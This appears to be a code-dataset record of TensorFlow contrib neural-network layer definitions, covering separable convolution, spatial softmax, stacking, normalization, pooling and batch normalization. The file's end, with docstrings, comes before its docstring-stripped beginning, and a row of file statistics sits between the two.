ValueError: If the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
with variable_scope.variable_scope(scope, 'Repeat', [inputs]):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'repeat'
outputs = inputs
for i in range(repetitions):
kwargs['scope'] = scope + '_' + str(i+1)
outputs = layer(outputs, *args, **kwargs)
return outputs
def _scale_gradient_shape(op):
"""Shape helper function for scale_gradient function below."""
return [op.inputs[0].shape]
def _scale_gradient_grad(op, grad):
"""Python gradient helper function for scale_gradient function below."""
return [grad * op.inputs[1], None]
@function.Defun(python_grad_func=_scale_gradient_grad,
shape_func=_scale_gradient_shape)
def scale_gradient(inputs, gradient_multiplier):
"""Identity operation, but with the gradient multiplied by a tensor.
The TensorFlow gradient system will compute the gradient with respect to
`inputs` as the product of the gradient with respect to the `output`
multiplied by a specified `gradient_multiplier` tensor. If
`gradient_multiplier` is equal to 1, then this results in the true gradient.
Otherwise, it results in a scaled gradient.
This can be useful for adjusting the relative learning rate of different
parameter tensors when performing gradient descent, and because this rescaling
can be inserted at arbitrary locations within a graph, is often more
convenient to apply than simply rescaling the final computed gradients.
Args:
inputs: Tensor to be output.
gradient_multiplier: Tensor by which to multiply the gradient with respect
to `output` to compute the gradient with respect to `inputs`. Its shape
must be broadcastable to the shape of `inputs`.
Returns:
output Tensor, equal to `inputs`.
"""
# gradient_multiplier is implicitly saved by decorator, and only used for
# gradient computation.
del gradient_multiplier
return inputs
@add_arg_scope
def separable_convolution2d(
inputs,
num_outputs,
kernel_size,
depth_multiplier,
stride=1,
padding='SAME',
data_format=DATA_FORMAT_NHWC,
rate=1,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a depth-separable 2D convolution with optional batch_norm layer.
This op first performs a depthwise convolution that acts separately on
channels, creating a variable called `depthwise_weights`. If `num_outputs`
is not None, it adds a pointwise convolution that mixes channels, creating a
variable called `pointwise_weights`. Then, if `normalizer_fn` is None,
it adds bias to the result, creating a variable called 'biases', otherwise,
the `normalizer_fn` is applied. It finally applies an activation function
to produce the end result.
Args:
inputs: A tensor of size [batch_size, height, width, channels].
num_outputs: The number of pointwise convolution output filters. If is
None, then we skip the pointwise convolution stage.
kernel_size: A list of length 2: [kernel_height, kernel_width] of
of the filters. Can be an int if both values are the same.
depth_multiplier: The number of depthwise convolution output channels for
each input channel. The total number of depthwise convolution output
channels will be equal to `num_filters_in * depth_multiplier`.
stride: A list of length 2: [stride_height, stride_width], specifying the
depthwise convolution stride. Can be an int if both strides are the same.
padding: One of 'VALID' or 'SAME'.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
rate: A list of length 2: [rate_height, rate_width], specifying the dilation
rates for atrous convolution. Can be an int if both rates are the same.
If any value is larger than one, then both stride values need to be one.
activation_fn: Activation function. The default value is a ReLU function.
Explicitly set it to None to skip it and maintain a linear activation.
normalizer_fn: Normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: Normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: Whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collection per variable.
outputs_collections: Collection to add the outputs.
trainable: Whether or not the variables should be trainable or not.
scope: Optional scope for variable_scope.
Returns:
A `Tensor` representing the output of the operation.
Raises:
ValueError: If `data_format` is invalid.
"""
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
layer_variable_getter = _build_variable_getter(
{'bias': 'biases',
'depthwise_kernel': 'depthwise_weights',
'pointwise_kernel': 'pointwise_weights'})
with variable_scope.variable_scope(
scope, 'SeparableConv2d', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
if num_outputs is not None:
# Apply separable conv using the SeparableConvolution2D layer.
layer = convolutional_layers.SeparableConvolution2D(
filters=num_outputs,
kernel_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
dilation_rate=utils.two_element_tuple(rate),
activation=None,
depth_multiplier=depth_multiplier,
use_bias=not normalizer_fn and biases_initializer,
depthwise_initializer=weights_initializer,
pointwise_initializer=weights_initializer,
bias_initializer=biases_initializer,
depthwise_regularizer=weights_regularizer,
pointwise_regularizer=weights_regularizer,
bias_regularizer=biases_regularizer,
activity_regularizer=None,
trainable=trainable,
name=sc.name,
dtype=inputs.dtype.base_dtype,
_scope=sc,
_reuse=reuse)
outputs = layer.apply(inputs)
# Add variables to collections.
_add_variable_to_collections(layer.depthwise_kernel,
variables_collections, 'weights')
_add_variable_to_collections(layer.pointwise_kernel,
variables_collections, 'weights')
if layer.bias:
_add_variable_to_collections(layer.bias,
variables_collections, 'biases')
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
# Actually apply depthwise conv instead of separable conv.
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.channel_dimension(
inputs.get_shape(), df, min_rank=4)
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
depthwise_shape = [kernel_h, kernel_w,
num_filters_in, depth_multiplier]
depthwise_weights = variables.model_variable(
'depthwise_weights',
shape=depthwise_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
strides = [1, stride_h, stride_w, 1]
outputs = nn.depthwise_conv2d(inputs, depthwise_weights, strides, padding,
rate=utils.two_element_tuple(rate),
data_format=data_format)
num_outputs = depth_multiplier * num_filters_in
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
trainable=trainable,
collections=biases_collections)
outputs = nn.bias_add(outputs, biases, data_format=data_format)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def softmax(logits, scope=None):
"""Performs softmax on Nth dimension of N-dimensional logit tensor.
For two-dimensional logits this reduces to tf.nn.softmax. The N-th dimension
needs to have a specified number of elements (number of classes).
Args:
logits: N-dimensional `Tensor` with logits, where N > 1.
scope: Optional scope for variable_scope.
Returns:
A `Tensor` with same shape and type as logits.
"""
# TODO(jrru): Add axis argument which defaults to last dimension.
with variable_scope.variable_scope(scope, 'softmax', [logits]):
num_logits = utils.last_dimension(logits.get_shape(), min_rank=2)
logits_2d = array_ops.reshape(logits, [-1, num_logits])
predictions = nn.softmax(logits_2d)
predictions = array_ops.reshape(predictions, array_ops.shape(logits))
predictions.set_shape(logits.get_shape())
return predictions
@add_arg_scope
def spatial_softmax(features,
temperature=None,
name=None,
variables_collections=None,
trainable=True,
data_format='NHWC'):
"""Computes the spatial softmax of a convolutional feature map.
First computes the softmax over the spatial extent of each channel of a
convolutional feature map. Then computes the expected 2D position of the
points of maximal activation for each channel, resulting in a set of
feature keypoints [x1, y1, ... xN, yN] for all N channels.
Read more here:
"Learning visual feature spaces for robotic manipulation with
deep spatial autoencoders." Finn et. al, http://arxiv.org/abs/1509.06113.
Args:
features: A `Tensor` of size [batch_size, W, H, num_channels]; the
convolutional feature map.
temperature: Softmax temperature (optional). If None, a learnable
temperature is created.
name: A name for this operation (optional).
variables_collections: Collections for the temperature variable.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
data_format: A string. `NHWC` (default) and `NCHW` are supported.
Returns:
feature_keypoints: A `Tensor` with size [batch_size, num_channels * 2];
the expected 2D locations of each channel's feature keypoint (normalized
to the range (-1,1)). The inner dimension is arranged as
[x1, y1, ... xN, yN].
Raises:
ValueError: If unexpected data_format specified.
ValueError: If num_channels dimension is unspecified.
"""
shape = array_ops.shape(features)
static_shape = features.shape
if data_format == DATA_FORMAT_NHWC:
height, width, num_channels = shape[1], shape[2], static_shape[3]
elif data_format == DATA_FORMAT_NCHW:
num_channels, height, width = static_shape[1], shape[2], shape[3]
else:
raise ValueError('data_format has to be either NCHW or NHWC.')
if num_channels.value is None:
raise ValueError('The num_channels dimension of the inputs to '
'`spatial_softmax` should be defined. Found `None`.')
with ops.name_scope(name, 'spatial_softmax', [features]) as name:
# Create tensors for x and y coordinate values, scaled to range [-1, 1].
pos_x, pos_y = array_ops.meshgrid(math_ops.lin_space(-1., 1., num=height),
math_ops.lin_space(-1., 1., num=width),
indexing='ij')
pos_x = array_ops.reshape(pos_x, [height * width])
pos_y = array_ops.reshape(pos_y, [height * width])
if temperature is None:
temperature_collections = utils.get_variable_collections(
variables_collections, 'temperature')
temperature = variables.model_variable(
'temperature',
shape=(),
dtype=dtypes.float32,
initializer=init_ops.ones_initializer(),
collections=temperature_collections,
trainable=trainable)
if data_format == 'NCHW':
features = array_ops.reshape(features, [-1, height * width])
else:
features = array_ops.reshape(
array_ops.transpose(features, [0, 3, 1, 2]), [-1, height * width])
softmax_attention = nn.softmax(features/temperature)
expected_x = math_ops.reduce_sum(
pos_x * softmax_attention, [1], keep_dims=True)
expected_y = math_ops.reduce_sum(
pos_y * softmax_attention, [1], keep_dims=True)
expected_xy = array_ops.concat([expected_x, expected_y], 1)
feature_keypoints = array_ops.reshape(
expected_xy, [-1, num_channels.value * 2])
feature_keypoints.set_shape([None, num_channels.value * 2])
return feature_keypoints
def stack(inputs, layer, stack_args, **kwargs):
"""Builds a stack of layers by applying layer repeatedly using stack_args.
`stack` allows you to repeatedly apply the same operation with different
arguments `stack_args[i]`. For each application of the layer, `stack` creates
a new scope appended with an increasing number. For example:
```python
y = stack(x, fully_connected, [32, 64, 128], scope='fc')
# It is equivalent to:
x = fully_connected(x, 32, scope='fc/fc_1')
x = fully_connected(x, 64, scope='fc/fc_2')
y = fully_connected(x, 128, scope='fc/fc_3')
```
If the `scope` argument is not given in `kwargs`, it is set to
`layer.__name__`, or `layer.func.__name__` (for `functools.partial`
objects). If neither `__name__` nor `func.__name__` is available, the
layers are called with `scope='stack'`.
Args:
inputs: A `Tensor` suitable for layer.
layer: A layer with arguments `(inputs, *args, **kwargs)`
stack_args: A list/tuple of parameters for each call of layer.
**kwargs: Extra kwargs for the layer.
Returns:
A `Tensor` result of applying the stacked layers.
Raises:
ValueError: If the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
if not isinstance(stack_args, (list, tuple)):
raise ValueError('stack_args need to be a list or tuple')
with variable_scope.variable_scope(scope, 'Stack', [inputs]):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'stack'
outputs = inputs
for i in range(len(stack_args)):
kwargs['scope'] = scope + '_' + str(i+1)
layer_args = stack_args[i]
if not isinstance(layer_args, (list, tuple)):
layer_args = [layer_args]
outputs = layer(outputs, *layer_args, **kwargs)
return outputs
@add_arg_scope
def unit_norm(inputs, dim, epsilon=1e-7, scope=None):
"""Normalizes the given input across the specified dimension to unit length.
Note that the rank of `input` must be known.
Args:
inputs: A `Tensor` of arbitrary size.
dim: The dimension along which the input is normalized.
epsilon: A small value to add to the inputs to avoid dividing by zero.
scope: Optional scope for variable_scope.
Returns:
The normalized `Tensor`.
Raises:
ValueError: If dim is smaller than the number of dimensions in 'inputs'.
"""
with variable_scope.variable_scope(scope, 'UnitNorm', [inputs]):
if not inputs.get_shape():
raise ValueError('The input rank must be known.')
input_rank = len(inputs.get_shape().as_list())
if dim < 0 or dim >= input_rank:
raise ValueError(
'dim must be positive but smaller than the input rank.')
lengths = math_ops.sqrt(epsilon + math_ops.reduce_sum(
math_ops.square(inputs), dim, True))
multiples = []
if dim > 0:
multiples.append(array_ops.ones([dim], dtypes.int32))
multiples.append(
array_ops.strided_slice(array_ops.shape(inputs), [dim], [dim + 1]))
if dim < (input_rank - 1):
multiples.append(array_ops.ones([input_rank - 1 - dim], dtypes.int32))
multiples = array_ops.concat(multiples, 0)
return math_ops.div(inputs, array_ops.tile(lengths, multiples))
def poincare_normalize(x, axis=1, epsilon=1e-5, name=None):
"""Project into the Poincare ball with norm <= 1.0 - epsilon.
https://en.wikipedia.org/wiki/Poincare_ball_model
Used in
Poincare Embeddings for Learning Hierarchical Representations
Maximilian Nickel, Douwe Kiela
https://arxiv.org/pdf/1705.08039.pdf
For a 1-D tensor with `axis = 0`, computes
(x * (1 - epsilon)) / ||x|| if ||x|| > 1 - epsilon
output =
x otherwise
For `x` with more dimensions, independently normalizes each 1-D slice along
dimension `axis`.
Args:
x: A `Tensor`.
axis: Axis along which to normalize. A scalar or a vector of
integers.
epsilon: A small deviation from the edge of the unit sphere for numerical
stability.
name: A name for this operation (optional).
Returns:
A `Tensor` with the same shape as `x`.
"""
with ops.name_scope(name, 'poincare_normalize', [x]) as name:
x = ops.convert_to_tensor(x, name='x')
square_sum = math_ops.reduce_sum(math_ops.square(x), axis, keep_dims=True)
x_inv_norm = math_ops.rsqrt(square_sum)
x_inv_norm = math_ops.minimum((1. - epsilon) * x_inv_norm, 1.)
return math_ops.multiply(x, x_inv_norm, name=name)
def legacy_fully_connected(x,
num_output_units,
activation_fn=None,
weight_init=initializers.xavier_initializer(),
bias_init=init_ops.zeros_initializer(),
name=None,
weight_collections=(ops.GraphKeys.WEIGHTS,),
bias_collections=(ops.GraphKeys.BIASES,),
output_collections=(ops.GraphKeys.ACTIVATIONS,),
trainable=True,
weight_regularizer=None,
bias_regularizer=None):
# pylint: disable=anomalous-backslash-in-string
r"""Adds the parameters for a fully connected layer and returns the output.
A fully connected layer is generally defined as a matrix multiply:
`y = f(w * x + b)` where `f` is given by `activation_fn`. If
`activation_fn` is `None`, the result of `y = w * x + b` is
returned.
If `x` has shape [\\\(\\text{dim}_0, \\text{dim}_1, ..., \\text{dim}_n\\\)]
with more than 2 dimensions (\\\(n > 1\\\)), then we repeat the matrix
multiply along the first dimensions. The result r is a tensor of shape
[\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`],
where \\\( r_{i_0, ..., i_{n-1}, k} =
\\sum_{0 \\leq j < \\text{dim}_n} x_{i_0, ... i_{n-1}, j} \cdot w_{j, k}\\\).
This is accomplished by reshaping `x` to 2-D
[\\\(\\text{dim}_0 \\cdot ... \\cdot \\text{dim}_{n-1}, \\text{dim}_n\\\)]
before the matrix multiply and afterwards reshaping it to
[\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`].
This op creates `w` and optionally `b`. Bias (`b`) can be disabled by setting
`bias_init` to `None`.
The variable creation is compatible with `tf.variable_scope` and so can be
reused with `tf.variable_scope` or `tf.make_template`.
Most of the details of variable creation can be controlled by specifying the
initializers (`weight_init` and `bias_init`) and in which collections to place
the created variables (`weight_collections` and `bias_collections`; note that
the variables are always added to the `VARIABLES` collection). The output of
the layer can be placed in custom collections using `output_collections`.
The collections arguments default to `WEIGHTS`, `BIASES` and `ACTIVATIONS`,
respectively.
A per layer regularization can be specified by setting `weight_regularizer`
and `bias_regularizer`, which are applied to the weights and biases
respectively, and whose output is added to the `REGULARIZATION_LOSSES`
collection.
Args:
x: The input `Tensor`.
num_output_units: The size of the output.
activation_fn: Activation function, default set to None to skip it and
maintain a linear activation.
weight_init: An optional weight initialization, defaults to
`xavier_initializer`.
bias_init: An initializer for the bias, defaults to 0. Set to `None` in
order to disable bias.
name: The name for this operation is used to name operations and to find
variables. If specified it must be unique for this scope, otherwise a
unique name starting with "fully_connected" will be created. See
`tf.variable_scope` for details.
weight_collections: List of graph collections to which weights are added.
bias_collections: List of graph collections to which biases are added.
output_collections: List of graph collections to which outputs are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
weight_regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`. Used for weights.
bias_regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`. Used for biases.
Returns:
The output of the fully connected layer.
Raises:
ValueError: If x has rank less than 2 or if its last dimension is not set.
"""
with variable_scope.variable_scope(name, 'fully_connected', [x]):
x = ops.convert_to_tensor(x)
dims = x.get_shape().dims
if dims is None:
raise ValueError('dims of x must be known but is None')
if len(dims) < 2:
raise ValueError('rank of x must be at least 2 not: %d' % len(dims))
num_input_units = dims[-1].value
if num_input_units is None:
raise ValueError('last dimension of x must be known but is None')
dtype = x.dtype.base_dtype
weight_collections = set(list(weight_collections or []) +
[ops.GraphKeys.GLOBAL_VARIABLES])
w = variable_scope.get_variable('weights',
shape=[num_input_units, num_output_units],
dtype=dtype,
initializer=weight_init,
collections=weight_collections,
regularizer=weight_regularizer,
trainable=trainable)
x_2_dim = x if len(dims) <= 2 else array_ops.reshape(x,
[-1, num_input_units])
y = standard_ops.matmul(x_2_dim, w)
if bias_init is not None:
bias_collections = set(list(bias_collections or []) +
[ops.GraphKeys.GLOBAL_VARIABLES])
b = variable_scope.get_variable('bias',
shape=[num_output_units],
dtype=dtype,
initializer=bias_init,
collections=bias_collections,
regularizer=bias_regularizer,
trainable=trainable)
y = nn.bias_add(y, b)
if len(dims) > 2:
out_shape = array_ops.unstack(array_ops.shape(x))
out_shape[-1] = num_output_units
y = array_ops.reshape(y, array_ops.stack(out_shape))
static_shape = x.get_shape().as_list()
static_shape[-1] = num_output_units
y.set_shape(static_shape)
return _apply_activation(y, activation_fn, output_collections)
# TODO(eiderm): Verify and fix autocomplete in colab (also relu6).
# Simple aliases which remove the activation_fn parameter.
elu = functools.partial(fully_connected, activation_fn=nn.elu)
legacy_relu = functools.partial(legacy_fully_connected, activation_fn=nn.relu)
legacy_linear = functools.partial(legacy_fully_connected, activation_fn=None)
relu = functools.partial(fully_connected, activation_fn=nn.relu)
relu6 = functools.partial(fully_connected, activation_fn=nn.relu6)
linear = functools.partial(fully_connected, activation_fn=None)
# Simple alias.
conv2d = convolution2d
conv3d = convolution3d
conv2d_transpose = convolution2d_transpose
conv3d_transpose = convolution3d_transpose
conv2d_in_plane = convolution2d_in_plane
separable_conv2d = separable_convolution2d
| 43.469997
| 95
| 0.672857
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import six
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base
from tensorflow.python.layers import convolutional as convolutional_layers
from tensorflow.python.layers import core as core_layers
from tensorflow.python.layers import normalization as normalization_layers
from tensorflow.python.layers import pooling as pooling_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.training import moving_averages
from tensorflow.python.layers.maxout import maxout
__all__ = ['avg_pool2d',
'avg_pool3d',
'batch_norm',
'bias_add',
'conv2d',
'conv3d',
'conv2d_in_plane',
'conv2d_transpose',
'conv3d_transpose',
'convolution',
'convolution2d',
'convolution2d_in_plane',
'convolution2d_transpose',
'convolution3d',
'convolution3d_transpose',
'dropout',
'elu',
'flatten',
'fully_connected',
'GDN',
'gdn',
'layer_norm',
'linear',
'pool',
'max_pool2d',
'max_pool3d',
'one_hot_encoding',
'relu',
'relu6',
'repeat',
'scale_gradient',
'separable_conv2d',
'separable_convolution2d',
'softmax',
'spatial_softmax',
'stack',
'unit_norm',
'legacy_fully_connected',
'legacy_linear',
'legacy_relu',
'maxout']
DATA_FORMAT_NCHW = 'NCHW'
DATA_FORMAT_NHWC = 'NHWC'
DATA_FORMAT_NCDHW = 'NCDHW'
DATA_FORMAT_NDHWC = 'NDHWC'
_FUSED_DEFAULT = os.getenv('TF_DEFAULT_USES_FUSED_BATCH_NORM',
'').lower() in ('true', 't', '1')
@add_arg_scope
def avg_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NHWC,
outputs_collections=None,
scope=None):
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with ops.name_scope(scope, 'AvgPool2D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = pooling_layers.AveragePooling2D(pool_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
_scope=sc)
outputs = layer.apply(inputs)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def avg_pool3d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NDHWC,
outputs_collections=None,
scope=None):
if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
raise ValueError('data_format has to be either NCDHW or NDHWC.')
with ops.name_scope(scope, 'AvgPool3D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
df = ('channels_first' if data_format and data_format.startswith('NC')
else 'channels_last')
layer = pooling_layers.AveragePooling3D(pool_size=kernel_size,
strides=stride,
padding=padding,
data_format=df,
_scope=sc)
outputs = layer.apply(inputs)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _fused_batch_norm(
inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
activation_fn=None,
param_initializers=None,
updates_collections=ops.GraphKeys.UPDATE_OPS,
is_training=True,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
data_format=DATA_FORMAT_NHWC,
zero_debias_moving_mean=False,
scope=None):
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with variable_scope.variable_scope(
scope, 'BatchNorm', [inputs], reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
original_shape = inputs.get_shape()
original_inputs = inputs
original_rank = original_shape.ndims
if original_rank is None:
raise ValueError('Inputs %s has undefined rank' % inputs.name)
elif original_rank not in [2, 4]:
raise ValueError('Inputs %s has unsupported rank.'
' Expected 2 or 4 but got %d' % (
inputs.name, original_rank))
if original_rank == 2:
channels = inputs.get_shape()[-1].value
if channels is None:
raise ValueError('`C` dimension must be known but is None')
new_shape = [-1, 1, 1, channels]
if data_format == DATA_FORMAT_NCHW:
new_shape = [-1, channels, 1, 1]
inputs = array_ops.reshape(inputs, new_shape)
inputs_shape = inputs.get_shape()
dtype = inputs.dtype.base_dtype
if data_format == DATA_FORMAT_NHWC:
params_shape = inputs_shape[-1:]
else:
params_shape = inputs_shape[1:2]
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined `C` dimension %s.' %
(inputs.name, params_shape))
trainable_beta = trainable and center
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
if not param_initializers:
param_initializers = {}
if center:
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer())
beta = variables.model_variable(
'beta',
shape=params_shape,
dtype=dtype,
initializer=beta_initializer,
collections=beta_collections,
trainable=trainable_beta)
else:
beta = array_ops.constant(0.0, shape=params_shape)
if scale:
gamma_collections = utils.get_variable_collections(
variables_collections, 'gamma')
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer())
gamma = variables.model_variable(
'gamma',
shape=params_shape,
dtype=dtype,
initializer=gamma_initializer,
collections=gamma_collections,
trainable=trainable)
else:
gamma = array_ops.constant(1.0, shape=params_shape)
moving_mean_collections = utils.get_variable_collections(
variables_collections, 'moving_mean')
moving_mean_initializer = param_initializers.get(
'moving_mean', init_ops.zeros_initializer())
moving_mean = variables.model_variable(
'moving_mean',
shape=params_shape,
dtype=dtype,
initializer=moving_mean_initializer,
trainable=False,
collections=moving_mean_collections)
moving_variance_collections = utils.get_variable_collections(
variables_collections, 'moving_variance')
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer())
moving_variance = variables.model_variable(
'moving_variance',
shape=params_shape,
dtype=dtype,
initializer=moving_variance_initializer,
trainable=False,
collections=moving_variance_collections)
def _fused_batch_norm_training():
return nn.fused_batch_norm(
inputs, gamma, beta, epsilon=epsilon, data_format=data_format)
def _fused_batch_norm_inference():
return nn.fused_batch_norm(
inputs,
gamma,
beta,
mean=moving_mean,
variance=moving_variance,
epsilon=epsilon,
is_training=False,
data_format=data_format)
outputs, mean, variance = utils.smart_cond(is_training,
_fused_batch_norm_training,
_fused_batch_norm_inference)
# a `Variable` or `Placeholder` then is_training_value will be None and
# `need_updates` will be true.
is_training_value = utils.constant_value(is_training)
need_updates = is_training_value is None or is_training_value
if need_updates:
if updates_collections is None:
no_updates = lambda: outputs
def _force_updates():
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
with ops.control_dependencies(
[update_moving_mean, update_moving_variance]):
return array_ops.identity(outputs)
outputs = utils.smart_cond(is_training, _force_updates, no_updates)
else:
moving_vars_fn = lambda: (moving_mean, moving_variance)
def _delay_updates():
"""Internal function that delay updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay, zero_debias=False)
return update_moving_mean, update_moving_variance
update_mean, update_variance = utils.smart_cond(is_training,
_delay_updates,
moving_vars_fn)
ops.add_to_collections(updates_collections, update_mean)
ops.add_to_collections(updates_collections, update_variance)
outputs.set_shape(inputs_shape)
if original_shape.ndims == 2:
outputs = array_ops.reshape(outputs, array_ops.shape(original_inputs))
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def batch_norm(inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
activation_fn=None,
param_initializers=None,
param_regularizers=None,
updates_collections=ops.GraphKeys.UPDATE_OPS,
is_training=True,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
batch_weights=None,
fused=None,
data_format=DATA_FORMAT_NHWC,
zero_debias_moving_mean=False,
scope=None,
renorm=False,
renorm_clipping=None,
renorm_decay=0.99):
# This environment variable is only used during the testing period of fused
# batch norm and will be removed after that.
if fused is None:
fused = _FUSED_DEFAULT
# Only use _fused_batch_norm if all of the following three
# conditions are true:
# (1) fused is set True;
# (2) it is possible to use (currently it doesn't support batch weights,
inputs = ops.convert_to_tensor(inputs)
rank = inputs.get_shape().ndims
possible_to_fuse = batch_weights is None and not renorm and rank in [2, 4]
if fused and possible_to_fuse and (
zero_debias_moving_mean or rank == 2 or
updates_collections is not ops.GraphKeys.UPDATE_OPS):
return _fused_batch_norm(
inputs,
decay=decay,
center=center,
scale=scale,
epsilon=epsilon,
activation_fn=activation_fn,
param_initializers=param_initializers,
updates_collections=updates_collections,
is_training=is_training,
reuse=reuse,
variables_collections=variables_collections,
outputs_collections=outputs_collections,
trainable=trainable,
data_format=data_format,
zero_debias_moving_mean=zero_debias_moving_mean,
scope=scope)
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
layer_variable_getter = _build_variable_getter()
with variable_scope.variable_scope(
scope, 'BatchNorm', [inputs], reuse=reuse,
custom_getter=layer_variable_getter) as sc:
inputs = ops.convert_to_tensor(inputs)
if (batch_weights is None and
updates_collections is ops.GraphKeys.UPDATE_OPS and
not zero_debias_moving_mean):
axis = 1 if data_format == DATA_FORMAT_NCHW else -1
if not param_initializers:
param_initializers = {}
beta_initializer = param_initializers.get('beta',
init_ops.zeros_initializer())
gamma_initializer = param_initializers.get('gamma',
init_ops.ones_initializer())
moving_mean_initializer = param_initializers.get(
'moving_mean', init_ops.zeros_initializer())
moving_variance_initializer = param_initializers.get(
'moving_variance', init_ops.ones_initializer())
if not param_regularizers:
param_regularizers = {}
beta_regularizer = param_regularizers.get('beta')
gamma_regularizer = param_regularizers.get('gamma')
layer = normalization_layers.BatchNormalization(
axis=axis,
momentum=decay,
epsilon=epsilon,
center=center,
scale=scale,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer,
moving_mean_initializer=moving_mean_initializer,
moving_variance_initializer=moving_variance_initializer,
beta_regularizer=beta_regularizer,
gamma_regularizer=gamma_regularizer,
trainable=trainable,
renorm=renorm,
renorm_clipping=renorm_clipping,
renorm_momentum=renorm_decay,
name=sc.name,
_scope=sc,
_reuse=reuse,
fused=fused)
